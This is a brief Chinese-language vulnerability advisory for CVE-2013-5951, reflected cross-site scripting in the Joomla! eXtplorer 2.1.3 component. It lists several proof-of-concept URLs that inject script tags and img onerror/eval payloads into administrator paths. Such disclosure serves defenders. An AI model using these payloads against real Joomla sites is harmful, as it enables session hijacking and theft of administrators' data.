CVE ID:CVE-2013-5951
Joomla!是一套在国外相当知名的内容管理系统。
Joomla! eXtplorer组件多个脚本不正确过滤用户提交的输入,允许远程攻击者利用漏洞进行跨站脚本攻击,可获取敏感信息或劫持用户会话。
0
Joomla! eXtplorer 2.1.3
目前没有详细解决方案提供:
http://www.joomla.org/
http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
http://www.example.com/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
http://www.example.com/administrator/index.php/<img src=x onerror=alert('XSS') >?option=com_extplorer&tmpl=component&action=post&do_action=copy
http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
http://www.example.com/administrator/index.php/<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=upload